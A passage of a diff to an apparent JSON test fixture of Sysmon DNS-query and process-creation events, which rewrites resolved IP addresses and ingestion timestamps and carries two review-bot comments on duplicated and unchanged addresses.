j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5230,7 +5152,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741416100Z", + "ingested": "2021-12-09T13:50:23.456839900Z", "code": "4", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e4\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e4\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e2\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.011\u003c/Data\u003e\u003cData Name='State'\u003eStarted\u003c/Data\u003e\u003cData Name='Version'\u003e9.01\u003c/Data\u003e\u003cData Name='SchemaVersion'\u003e4.20\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5294,12 +5216,12 @@ "type": "CNAME" }, { - "data": "72.30.2.182", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "network": { 
@@ -5315,13 +5237,13 @@ "pr-bh.ybp.yahoo.com" ], "ip": [ - "72.30.2.182" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741424500Z", + "ingested": "2021-12-09T13:50:23.456845700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5381,12 +5303,12 @@ }, "answers": [ { - "data": "3.83.220.223", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "network": { 
@@ -5401,13 +5323,13 @@ "ps.eyeota.net" ], "ip": [ - "3.83.220.223" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741433300Z", + "ingested": "2021-12-09T13:50:23.456852Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:3.83.220.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802441200Z'/\u003e\u003cEventRecordID\u003e108\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.113\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eps.eyeota.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5502,7 +5424,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741441900Z", + "ingested": "2021-12-09T13:50:23.456857700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e3\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.949\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-0010c73e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4860\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e9.01\u003c/Data\u003e\u003cData Name='Description'\u003eSystem activity monitor\u003c/Data\u003e\u003cData Name='Product'\u003eSysinternals Sysmon\u003c/Data\u003e\u003cData Name='Company'\u003eSysinternals - www.sysinternals.com\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\Sysmon.exe\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData 
Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=AC93C3B38E57A2715572933DBCB2A1C2892DBC5E\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0010f14d0000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e488\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\services.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\services.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5583,17 +5505,17 @@ "type": "CNAME" }, { - "data": "204.2.197.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.2.197.211", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
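Review bot: In the `@@ -5583` hunk both A answers for the same name are rewritten to the identical `89.160.20.156`, so `dns.resolved_ip` now holds a duplicate and the fixture no longer shows the one-to-one correspondence between distinct `dns.answers` entries and `dns.resolved_ip` that the previous data exercised; the same collapse appears in the `@@ -6165` and `@@ -6325` hunks. If the supported subset offers more than one address, giving each answer a distinct value (for example keeping `"data": "89.160.20.156"` for the first answer and a second supported address for the next) would preserve that coverage while still satisfying the policy. The enclosing document extends well beyond the hunk, so this is inferred from the visible `answers` and `resolved_ip` arrays only.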
@@ -5611,14 +5533,13 @@ "idpix.media6degrees.com" ], "ip": [ - "204.2.197.201", - "204.2.197.211" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741450700Z", + "ingested": "2021-12-09T13:50:23.456863700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:204.2.197.201;::ffff:204.2.197.211;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider 
Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802456000Z'/\u003e\u003cEventRecordID\u003e109\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidpix.media6degrees.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idpix.media6degrees.com.cdn.cloudflare.net;type: 5 map.media6degrees.com;type: 5 map.media6degrees.com.cdn.cloudflare.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5682,11 +5603,11 @@ "type": "CNAME" }, { - "data": "172.217.10.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5694,7 +5615,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -5702,7 +5623,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5710,7 +5631,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5719,14 +5640,14 @@ } ], "resolved_ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
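Review bot: The IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30` and `2001:500:856e::30` are left unchanged in the `@@ -5719` hunk while the neighbouring IPv4 root-server addresses are rewritten to RFC 1918 `192.168.x.30`; if the supported-subset rule applies to IPv6 as well, these should be replaced under the same policy. The same untouched IPv6 values recur in the `@@ -5743`, `@@ -5965`, `@@ -5990`, `@@ -6214`, `@@ -6240`, `@@ -6447` and `@@ -6474` hunks. Any such replacement would also need the matching edit in the `QueryResults` portion of the corresponding `event.original` strings so `dns.resolved_ip` stays consistent with the raw event.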
@@ -5743,21 +5664,21 @@ "tpc.googlesyndication.com" ], "ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741459300Z", + "ingested": "2021-12-09T13:50:23.456869600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5858,7 +5779,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741468300Z", + "ingested": "2021-12-09T13:50:23.456875800Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e4\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.964\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-00102c412a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5028\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\unsecapp.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eSink to receive asynchronous callbacks for WMI client application\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT 
AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=6DF8163A6320B80B60733F9D62E2F39B4B16B678\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -5928,11 +5849,11 @@ "type": "CNAME" }, { - "data": "162.248.19.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5940,7 +5861,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5948,7 +5869,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5956,7 +5877,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5965,14 +5886,14 @@ } ], "resolved_ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -5990,21 +5911,21 @@ "image2.pubmatic.com" ], "ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741476800Z", + "ingested": "2021-12-09T13:50:23.456882Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData 